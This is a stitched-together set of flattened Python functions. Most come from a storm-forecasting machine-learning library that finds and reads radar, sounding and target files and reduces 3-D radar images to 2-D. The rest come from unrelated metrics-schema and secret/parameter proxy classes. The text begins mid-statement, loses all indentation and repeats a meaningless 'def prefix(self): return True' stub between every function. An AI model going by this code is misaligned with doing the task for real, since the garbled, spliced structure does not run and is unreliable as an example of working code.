numpy.where(radar_file_name_matrix == '')[0] ) radar_file_name_matrix = numpy.delete( radar_file_name_matrix, time_missing_indices, axis=0) return radar_file_name_matrix[:, :2], radar_file_name_matrix[:, 2:]
def prefix(self): return True
def find_sounding_files( top_sounding_dir_name, radar_file_name_matrix, target_names, lag_time_for_convective_contamination_sec): """Locates files with storm-centered soundings. D = number of SPC dates in time period :param top_sounding_dir_name: Name of top-level directory. Files therein will be found by `soundings.find_sounding_file`. :param radar_file_name_matrix: numpy array created by either `find_storm_images_2d` or `find_storm_images_3d`. Length of the first axis is D. :param target_names: See doc for `_check_target_vars`. :param lag_time_for_convective_contamination_sec: See doc for `soundings.read_soundings`. :return: sounding_file_names: length-D list of file paths. """ error_checking.assert_is_numpy_array(radar_file_name_matrix) num_file_dimensions = len(radar_file_name_matrix.shape) error_checking.assert_is_geq(num_file_dimensions, 2) error_checking.assert_is_leq(num_file_dimensions, 3) mean_lead_time_seconds = _check_target_vars(target_names)[0] num_file_times = radar_file_name_matrix.shape[0] sounding_file_names = [''] * num_file_times for i in range(num_file_times): if num_file_dimensions == 2: this_file_name = radar_file_name_matrix[i, 0] else: this_file_name = radar_file_name_matrix[i, 0, 0] this_time_unix_sec, this_spc_date_string = ( storm_images.image_file_name_to_time(this_file_name) ) sounding_file_names[i] = soundings.find_sounding_file( top_directory_name=top_sounding_dir_name, spc_date_string=this_spc_date_string, lead_time_seconds=mean_lead_time_seconds, lag_time_for_convective_contamination_sec= lag_time_for_convective_contamination_sec, init_time_unix_sec=this_time_unix_sec, raise_error_if_missing=True) return sounding_file_names
def prefix(self): return True
def find_target_files(top_target_dir_name, radar_file_name_matrix, target_names): """Locates files with target values (storm-hazard indicators). D = number of SPC dates in time period :param top_target_dir_name: Name of top-level directory. Files therein will be found by `target_val_utils.find_target_file`. :param radar_file_name_matrix: numpy array created by either `find_storm_images_2d` or `find_storm_images_3d`. Length of the first axis is D. :param target_names: See doc for `_check_target_vars`. :return: target_file_names: length-D list of file paths. """ error_checking.assert_is_numpy_array(radar_file_name_matrix) num_file_dimensions = len(radar_file_name_matrix.shape) error_checking.assert_is_geq(num_file_dimensions, 2) error_checking.assert_is_leq(num_file_dimensions, 3) event_type_string = _check_target_vars(target_names)[-1] num_file_times = radar_file_name_matrix.shape[0] target_file_names = [''] * num_file_times for i in range(num_file_times): if num_file_dimensions == 2: this_file_name = radar_file_name_matrix[i, 0] else: this_file_name = radar_file_name_matrix[i, 0, 0] _, this_spc_date_string = storm_images.image_file_name_to_time( this_file_name) target_file_names[i] = target_val_utils.find_target_file( top_directory_name=top_target_dir_name, event_type_string=event_type_string, spc_date_string=this_spc_date_string, raise_error_if_missing=False) if os.path.isfile(target_file_names[i]): continue target_file_names[i] = None return target_file_names
def prefix(self): return True
def subset_examples(example_dict, indices_to_keep, create_new_dict=False): """Subsets examples in dictionary. :param example_dict: See doc for `write_example_file`. :param indices_to_keep: 1-D numpy array with indices of examples to keep. :param create_new_dict: Boolean flag. If True, this method will create a new dictionary, leaving the input dictionary untouched. :return: example_dict: Same as input, but possibly with fewer examples. """ error_checking.assert_is_integer_numpy_array(indices_to_keep) error_checking.assert_is_numpy_array(indices_to_keep, num_dimensions=1) error_checking.assert_is_boolean(create_new_dict) if not create_new_dict: for this_key in MAIN_KEYS: optional_key_missing = ( this_key not in REQUIRED_MAIN_KEYS and this_key not in example_dict ) if optional_key_missing: continue if this_key == TARGET_MATRIX_KEY: if this_key in example_dict: example_dict[this_key] = ( example_dict[this_key][indices_to_keep, ...] ) else: example_dict[TARGET_VALUES_KEY] = ( example_dict[TARGET_VALUES_KEY][indices_to_keep] ) continue if this_key == FULL_IDS_KEY: example_dict[this_key] = [ example_dict[this_key][k] for k in indices_to_keep ] else: example_dict[this_key] = example_dict[this_key][ indices_to_keep, ...] return example_dict new_example_dict = {} for this_key in METADATA_KEYS: sounding_key_missing = ( this_key in [SOUNDING_FIELDS_KEY, SOUNDING_HEIGHTS_KEY] and this_key not in example_dict ) if sounding_key_missing: continue if this_key == TARGET_NAMES_KEY: if this_key in example_dict: new_example_dict[this_key] = example_dict[this_key] else: new_example_dict[TARGET_NAME_KEY] = example_dict[ TARGET_NAME_KEY] continue new_example_dict[this_key] = example_dict[this_key] for this_key in MAIN_KEYS: optional_key_missing = ( this_key not in REQUIRED_MAIN_KEYS and this_key not in example_dict ) if optional_key_missing: continue if this_key == TARGET_MATRIX_KEY: if this_key in example_dict: new_example_dict[this_key] = ( example_dict[this_key][indices_to_keep, ...] ) else: new_example_dict[TARGET_VALUES_KEY] = ( example_dict[TARGET_VALUES_KEY][indices_to_keep] ) continue if this_key == FULL_IDS_KEY: new_example_dict[this_key] = [ example_dict[this_key][k] for k in indices_to_keep ] else: new_example_dict[this_key] = example_dict[this_key][ indices_to_keep, ...] return new_example_dict
def prefix(self): return True
def find_example_file( top_directory_name, shuffled=True, spc_date_string=None, batch_number=None, raise_error_if_missing=True): """Looks for file with input examples. If `shuffled = True`, this method looks for a file with shuffled examples (from many different times). If `shuffled = False`, this method looks for a file with examples from one SPC date. :param top_directory_name: Name of top-level directory with input examples. :param shuffled: Boolean flag. The role of this flag is explained in the general discussion above. :param spc_date_string: [used only if `shuffled = False`] SPC date (format "yyyymmdd"). :param batch_number: [used only if `shuffled = True`] Batch number (integer). :param raise_error_if_missing: Boolean flag. If file is missing and `raise_error_if_missing = True`, this method will error out. :return: example_file_name: Path to file with input examples. If file is missing and `raise_error_if_missing = False`, this is the *expected* path. :raises: ValueError: if file is missing and `raise_error_if_missing = True`. """ error_checking.assert_is_string(top_directory_name) error_checking.assert_is_boolean(shuffled) error_checking.assert_is_boolean(raise_error_if_missing) if shuffled: error_checking.assert_is_integer(batch_number) error_checking.assert_is_geq(batch_number, 0) first_batch_number = int(number_rounding.floor_to_nearest( batch_number, NUM_BATCHES_PER_DIRECTORY)) last_batch_number = first_batch_number + NUM_BATCHES_PER_DIRECTORY - 1 example_file_name = ( '{0:s}/batches{1:07d}-{2:07d}/input_examples_batch{3:07d}.nc' ).format(top_directory_name, first_batch_number, last_batch_number, batch_number) else: time_conversion.spc_date_string_to_unix_sec(spc_date_string) example_file_name = ( '{0:s}/{1:s}/input_examples_{2:s}.nc' ).format(top_directory_name, spc_date_string[:4], spc_date_string) if raise_error_if_missing and not os.path.isfile(example_file_name): error_string = 'Cannot find file. Expected at: "{0:s}"'.format( example_file_name) raise ValueError(error_string) return example_file_name
def prefix(self): return True
def find_many_example_files( top_directory_name, shuffled=True, first_spc_date_string=None, last_spc_date_string=None, first_batch_number=None, last_batch_number=None, raise_error_if_any_missing=True): """Looks for many files with input examples. :param top_directory_name: See doc for `find_example_file`. :param shuffled: Same. :param first_spc_date_string: [used only if `shuffled = False`] First SPC date (format "yyyymmdd"). This method will look for all SPC dates from `first_spc_date_string`...`last_spc_date_string`. :param last_spc_date_string: See above. :param first_batch_number: [used only if `shuffled = True`] First batch number (integer). This method will look for all batches from `first_batch_number`...`last_batch_number`. :param last_batch_number: See above. :param raise_error_if_any_missing: Boolean flag. If *any* desired file is not found and `raise_error_if_any_missing = True`, this method will error out. :return: example_file_names: 1-D list of paths to example files. :raises: ValueError: if no files are found. """ error_checking.assert_is_boolean(shuffled) if shuffled: error_checking.assert_is_integer(first_batch_number) error_checking.assert_is_integer(last_batch_number) error_checking.assert_is_geq(first_batch_number, 0) error_checking.assert_is_geq(last_batch_number, first_batch_number) example_file_pattern = ( '{0:s}/batches{1:s}-{1:s}/input_examples_batch{1:s}.nc' ).format(top_directory_name, BATCH_NUMBER_REGEX) example_file_names = glob.glob(example_file_pattern) if len(example_file_names) > 0: batch_numbers = numpy.array( [_file_name_to_batch_number(f) for f in example_file_names], dtype=int) good_indices = numpy.where(numpy.logical_and( batch_numbers >= first_batch_number, batch_numbers <= last_batch_number ))[0] example_file_names = [example_file_names[k] for k in good_indices] if len(example_file_names) == 0: error_string = ( 'Cannot find any files with batch number from {0:d}...{1:d}.' ).format(first_batch_number, last_batch_number) raise ValueError(error_string) return example_file_names spc_date_strings = time_conversion.get_spc_dates_in_range( first_spc_date_string=first_spc_date_string, last_spc_date_string=last_spc_date_string) example_file_names = [] for this_spc_date_string in spc_date_strings: this_file_name = find_example_file( top_directory_name=top_directory_name, shuffled=False, spc_date_string=this_spc_date_string, raise_error_if_missing=raise_error_if_any_missing) if not os.path.isfile(this_file_name): continue example_file_names.append(this_file_name) if len(example_file_names) == 0: error_string = ( 'Cannot find any file with SPC date from {0:s} to {1:s}.' ).format(first_spc_date_string, last_spc_date_string) raise ValueError(error_string) return example_file_names
def prefix(self): return True
def read_example_file( netcdf_file_name, read_all_target_vars, target_name=None, metadata_only=False, targets_only=False, include_soundings=True, radar_field_names_to_keep=None, radar_heights_to_keep_m_agl=None, sounding_field_names_to_keep=None, sounding_heights_to_keep_m_agl=None, first_time_to_keep_unix_sec=None, last_time_to_keep_unix_sec=None, num_rows_to_keep=None, num_columns_to_keep=None, downsampling_dict=None): """Reads examples from NetCDF file. If `metadata_only == True`, later input args are ignored. If `targets_only == True`, later input args are ignored. :param netcdf_file_name: Path to input file. :param read_all_target_vars: Boolean flag. If True, will read all target variables. If False, will read only `target_name`. Either way, if downsampling is done, it will be based only on `target_name`. :param target_name: Will read this target variable. If `read_all_target_vars == True` and `downsampling_dict is None`, you can leave this alone. :param metadata_only: Boolean flag. If False, this method will read everything. If True, will read everything except predictor and target variables. :param targets_only: Boolean flag. If False, this method will read everything. If True, will read everything except predictors. :param include_soundings: Boolean flag. If True and the file contains soundings, this method will return soundings. Otherwise, no soundings. :param radar_field_names_to_keep: See doc for `_subset_radar_data`. :param radar_heights_to_keep_m_agl: Same. :param sounding_field_names_to_keep: See doc for `_subset_sounding_data`. :param sounding_heights_to_keep_m_agl: Same. :param first_time_to_keep_unix_sec: First time to keep. If `first_time_to_keep_unix_sec is None`, all storm objects will be kept. :param last_time_to_keep_unix_sec: Last time to keep. If `last_time_to_keep_unix_sec is None`, all storm objects will be kept. :param num_rows_to_keep: See doc for `_subset_radar_data`. :param num_columns_to_keep: Same. :param downsampling_dict: See doc for `_filter_examples_by_class`. :return: example_dict: If `read_all_target_vars == True`, dictionary will have all keys listed in doc for `write_example_file`. If `read_all_target_vars == False`, key "target_names" will be replaced by "target_name" and "target_matrix" will be replaced by "target_values". example_dict['target_name']: Name of target variable. example_dict['target_values']: length-E list of target values (integer class labels), where E = number of examples. """ # TODO(thunderhoser): Allow this method to read only soundings without radar # data. if ( target_name == 'tornado_lead-time=0000-3600sec_distance=00000-10000m' ): target_name = ( 'tornado_lead-time=0000-3600sec_distance=00000-30000m_min-fujita=0' ) error_checking.assert_is_boolean(read_all_target_vars) error_checking.assert_is_boolean(include_soundings) error_checking.assert_is_boolean(metadata_only) error_checking.assert_is_boolean(targets_only) example_dict, netcdf_dataset = _read_metadata_from_example_file( netcdf_file_name=netcdf_file_name, include_soundings=include_soundings) need_main_target_values = ( not read_all_target_vars or downsampling_dict is not None ) if need_main_target_values: target_index = example_dict[TARGET_NAMES_KEY].index(target_name) else: target_index = -1 if not read_all_target_vars: example_dict[TARGET_NAME_KEY] = target_name example_dict.pop(TARGET_NAMES_KEY) if metadata_only: netcdf_dataset.close() return example_dict if need_main_target_values: main_target_values = numpy.array( netcdf_dataset.variables[TARGET_MATRIX_KEY][:, target_index], dtype=int ) else: main_target_values = None if read_all_target_vars: example_dict[TARGET_MATRIX_KEY] = numpy.array( netcdf_dataset.variables[TARGET_MATRIX_KEY][:], dtype=int ) else: example_dict[TARGET_VALUES_KEY] = main_target_values # Subset by time. if first_time_to_keep_unix_sec is None: first_time_to_keep_unix_sec = 0 if last_time_to_keep_unix_sec is None: last_time_to_keep_unix_sec = int(1e12) error_checking.assert_is_integer(first_time_to_keep_unix_sec) error_checking.assert_is_integer(last_time_to_keep_unix_sec) error_checking.assert_is_geq( last_time_to_keep_unix_sec, first_time_to_keep_unix_sec) example_indices_to_keep = numpy.where(numpy.logical_and( example_dict[STORM_TIMES_KEY] >= first_time_to_keep_unix_sec, example_dict[STORM_TIMES_KEY] <= last_time_to_keep_unix_sec ))[0] if downsampling_dict is not None: subindices_to_keep = _filter_examples_by_class( target_values=main_target_values[example_indices_to_keep], downsampling_dict=downsampling_dict ) elif not read_all_target_vars: subindices_to_keep = numpy.where( main_target_values[example_indices_to_keep] != target_val_utils.INVALID_STORM_INTEGER )[0] else: subindices_to_keep = numpy.linspace( 0, len(example_indices_to_keep) - 1, num=len(example_indices_to_keep), dtype=int ) example_indices_to_keep = example_indices_to_keep[subindices_to_keep] if len(example_indices_to_keep) == 0: return None example_dict[FULL_IDS_KEY] = [ example_dict[FULL_IDS_KEY][k] for k in example_indices_to_keep ] example_dict[STORM_TIMES_KEY] = ( example_dict[STORM_TIMES_KEY][example_indices_to_keep] ) if read_all_target_vars: example_dict[TARGET_MATRIX_KEY] = ( example_dict[TARGET_MATRIX_KEY][example_indices_to_keep, :] ) else: example_dict[TARGET_VALUES_KEY] = ( example_dict[TARGET_VALUES_KEY][example_indices_to_keep] ) if targets_only: netcdf_dataset.close() return example_dict example_dict = _subset_radar_data( example_dict=example_dict, netcdf_dataset_object=netcdf_dataset, example_indices_to_keep=example_indices_to_keep, field_names_to_keep=radar_field_names_to_keep, heights_to_keep_m_agl=radar_heights_to_keep_m_agl, num_rows_to_keep=num_rows_to_keep, num_columns_to_keep=num_columns_to_keep) if not include_soundings: netcdf_dataset.close() return example_dict example_dict = _subset_sounding_data( example_dict=example_dict, netcdf_dataset_object=netcdf_dataset, example_indices_to_keep=example_indices_to_keep, field_names_to_keep=sounding_field_names_to_keep, heights_to_keep_m_agl=sounding_heights_to_keep_m_agl) netcdf_dataset.close() return example_dict
def prefix(self): return True
def read_specific_examples( netcdf_file_name, read_all_target_vars, full_storm_id_strings, storm_times_unix_sec, target_name=None, include_soundings=True, radar_field_names_to_keep=None, radar_heights_to_keep_m_agl=None, sounding_field_names_to_keep=None, sounding_heights_to_keep_m_agl=None, num_rows_to_keep=None, num_columns_to_keep=None): """Reads specific examples (with specific ID-time pairs) from NetCDF file. :param netcdf_file_name: Path to input file. :param read_all_target_vars: See doc for `read_example_file`. :param full_storm_id_strings: length-E list of storm IDs. :param storm_times_unix_sec: length-E numpy array of valid times. :param target_name: See doc for `read_example_file`. :param metadata_only: Same. :param include_soundings: Same. :param radar_field_names_to_keep: Same. :param radar_heights_to_keep_m_agl: Same. :param sounding_field_names_to_keep: Same. :param sounding_heights_to_keep_m_agl: Same. :param num_rows_to_keep: Same. :param num_columns_to_keep: Same. :return: example_dict: See doc for `write_example_file`. """ if ( target_name == 'tornado_lead-time=0000-3600sec_distance=00000-10000m' ): target_name = ( 'tornado_lead-time=0000-3600sec_distance=00000-30000m_min-fujita=0' ) error_checking.assert_is_boolean(read_all_target_vars) error_checking.assert_is_boolean(include_soundings) example_dict, dataset_object = _read_metadata_from_example_file( netcdf_file_name=netcdf_file_name, include_soundings=include_soundings) example_indices_to_keep = tracking_utils.find_storm_objects( all_id_strings=example_dict[FULL_IDS_KEY], all_times_unix_sec=example_dict[STORM_TIMES_KEY], id_strings_to_keep=full_storm_id_strings, times_to_keep_unix_sec=storm_times_unix_sec, allow_missing=False ) example_dict[FULL_IDS_KEY] = [ example_dict[FULL_IDS_KEY][k] for k in example_indices_to_keep ] example_dict[STORM_TIMES_KEY] = example_dict[STORM_TIMES_KEY][ example_indices_to_keep] if read_all_target_vars: example_dict[TARGET_MATRIX_KEY] = numpy.array( dataset_object.variables[TARGET_MATRIX_KEY][ example_indices_to_keep, :], dtype=int ) else: target_index = example_dict[TARGET_NAMES_KEY].index(target_name) example_dict[TARGET_NAME_KEY] = target_name example_dict.pop(TARGET_NAMES_KEY) example_dict[TARGET_VALUES_KEY] = numpy.array( dataset_object.variables[TARGET_MATRIX_KEY][ example_indices_to_keep, target_index], dtype=int ) example_dict = _subset_radar_data( example_dict=example_dict, netcdf_dataset_object=dataset_object, example_indices_to_keep=example_indices_to_keep, field_names_to_keep=radar_field_names_to_keep, heights_to_keep_m_agl=radar_heights_to_keep_m_agl, num_rows_to_keep=num_rows_to_keep, num_columns_to_keep=num_columns_to_keep) if not include_soundings: dataset_object.close() return example_dict example_dict = _subset_sounding_data( example_dict=example_dict, netcdf_dataset_object=dataset_object, example_indices_to_keep=example_indices_to_keep, field_names_to_keep=sounding_field_names_to_keep, heights_to_keep_m_agl=sounding_heights_to_keep_m_agl) dataset_object.close() return example_dict
def prefix(self): return True
def reduce_examples_3d_to_2d(example_dict, list_of_operation_dicts): """Reduces examples from 3-D to 2-D. If the examples contain both 2-D azimuthal-shear images and 3-D reflectivity images: - Keys "reflectivity_image_matrix_dbz" and "az_shear_image_matrix_s01" are required. - "radar_heights_m_agl" should contain only reflectivity heights. - "radar_field_names" should contain only the names of azimuthal-shear fields. If the examples contain 3-D radar images and no 2-D images: - Key "radar_image_matrix" is required. - Each field in "radar_field_names" appears at each height in "radar_heights_m_agl". - Thus, there are F_r elements in "radar_field_names", H_r elements in "radar_heights_m_agl", and F_r * H_r field-height pairs. After dimensionality reduction (from 3-D to 2-D): - Keys "reflectivity_image_matrix_dbz", "az_shear_image_matrix_s01", and "radar_heights_m_agl" will be absent. - Key "radar_image_matrix" will be present. The dimensions will be E x M x N x C. - Key "radar_field_names" will be a length-C list, where the [j]th item is the field name for the [j]th channel of radar_image_matrix (radar_image_matrix[..., j]). - Key "min_radar_heights_m_agl" will be a length-C numpy array, where the [j]th item is the MINIMUM height for the [j]th channel of radar_image_matrix. - Key "max_radar_heights_m_agl" will be a length-C numpy array, where the [j]th item is the MAX height for the [j]th channel of radar_image_matrix. - Key "radar_layer_operation_names" will be a length-C list, where the [j]th item is the name of the operation used to create the [j]th channel of radar_image_matrix. :param example_dict: See doc for `write_example_file`. :param list_of_operation_dicts: See doc for `_check_layer_operation`. :return: example_dict: See general discussion above, for how the input `example_dict` is changed to the output `example_dict`. """ if RADAR_IMAGE_MATRIX_KEY in example_dict: num_radar_dimensions = len( example_dict[RADAR_IMAGE_MATRIX_KEY].shape ) - 2 assert num_radar_dimensions == 3 new_radar_image_matrix = None new_field_names = [] new_min_heights_m_agl = [] new_max_heights_m_agl = [] new_operation_names = [] if AZ_SHEAR_IMAGE_MATRIX_KEY in example_dict: new_radar_image_matrix = example_dict[AZ_SHEAR_IMAGE_MATRIX_KEY] + 0. for this_field_name in example_dict[RADAR_FIELDS_KEY]: new_field_names.append(this_field_name) new_operation_names.append(MAX_OPERATION_NAME) if this_field_name == radar_utils.LOW_LEVEL_SHEAR_NAME: new_min_heights_m_agl.append(0) new_max_heights_m_agl.append(2000) else: new_min_heights_m_agl.append(3000) new_max_heights_m_agl.append(6000) for this_operation_dict in list_of_operation_dicts: this_new_matrix, this_operation_dict = _apply_layer_operation( example_dict=example_dict, operation_dict=this_operation_dict) this_new_matrix = numpy.expand_dims(this_new_matrix, axis=-1) if new_radar_image_matrix is None: new_radar_image_matrix = this_new_matrix + 0. else: new_radar_image_matrix = numpy.concatenate( (new_radar_image_matrix, this_new_matrix), axis=-1 ) new_field_names.append(this_operation_dict[RADAR_FIELD_KEY]) new_min_heights_m_agl.append(this_operation_dict[MIN_HEIGHT_KEY]) new_max_heights_m_agl.append(this_operation_dict[MAX_HEIGHT_KEY]) new_operation_names.append(this_operation_dict[OPERATION_NAME_KEY]) example_dict.pop(REFL_IMAGE_MATRIX_KEY, None) example_dict.pop(AZ_SHEAR_IMAGE_MATRIX_KEY, None) example_dict.pop(RADAR_HEIGHTS_KEY, None) example_dict[RADAR_IMAGE_MATRIX_KEY] = new_radar_image_matrix example_dict[RADAR_FIELDS_KEY] = new_field_names example_dict[MIN_RADAR_HEIGHTS_KEY] = numpy.array( new_min_heights_m_agl, dtype=int) example_dict[MAX_RADAR_HEIGHTS_KEY] = numpy.array( new_max_heights_m_agl, dtype=int) example_dict[RADAR_LAYER_OPERATION_NAMES_KEY] = new_operation_names return example_dict
def prefix(self): return True
def get_schema(self): """Returns the set YAML schema for the metric class. Returns: YAML schema of the metrics type. """ return self._schema
def prefix(self): return True
def get(self): return os.environ[self._name]
def prefix(self): return True
def get_metrics(self): """Returns the stored metrics. The metrics are type checked against the set schema. Returns: Dictionary of metrics data in the format of the set schema. """ artifact_utils.verify_schema_instance(self._schema, self._values) return self._values
def prefix(self): return True
def __init__(self, resolver, proxy_type, key): if proxy_type == "file": self._method = resolver.get_file_content elif proxy_type == "param": self._method = resolver.get_parameter_value elif proxy_type == "secret": self._method = resolver.get_secret_value elif proxy_type == "bucket_file": self._method = resolver.get_bucket_file else: raise ValueError("Unknown proxy type %s", proxy_type) self._key = key
def prefix(self): return True
def __init__(self, schema_file: str): self._schema = artifact_utils.read_schema_file(schema_file) self._type_name, self._metric_fields = artifact_utils.parse_schema( self._schema) self._values = {}
def prefix(self): return True
def get(self): return self._method(self._key)
def prefix(self): return True
def __getattr__(self, name: str) -> Any: """Custom __getattr__ to allow access to metrics schema fields.""" if name not in self._metric_fields: raise AttributeError('No field: {} in metrics.'.format(name)) return self._values[name]
def prefix(self): return True
def __init__(self, child_proxy): self._child_proxy = child_proxy
def prefix(self): return True
def __setattr__(self, name: str, value: Any): """Custom __setattr__ to allow access to metrics schema fields.""" if not self._initialized: object.__setattr__(self, name, value) return if name not in self._metric_fields: raise RuntimeError( 'Field: {} not defined in metirc schema'.format(name)) self._values[name] = value
def prefix(self): return True
def get(self): return json.loads(self._child_proxy.get())
def prefix(self): return True
def __init__(self): super().__init__('confidence_metrics.yaml') self._initialized = True
def prefix(self): return True
def __init__(self): super().__init__('confusion_matrix.yaml') self._matrix = [[]] self._categories = [] self._initialized = True
def prefix(self): return True
def get(self): return base64.b64decode(self._child_proxy.get())
def prefix(self): return True
def set_categories(self, categories: List[str]): """Sets the categories for Confusion Matrix. Args: categories: List of strings specifying the categories. """ self._categories = [] annotation_specs = [] for category in categories: annotation_spec = {'displayName': category} self._categories.append(category) annotation_specs.append(annotation_spec) self._values['annotationSpecs'] = annotation_specs self._matrix = [[0 for i in range(len(self._categories))] for j in range(len(self._categories))] self._values['row'] = self._matrix
def prefix(self): return True
def __init__(self, key, child_proxy): try: self._key = int(key) except ValueError: self._key = key self._child_proxy = child_proxy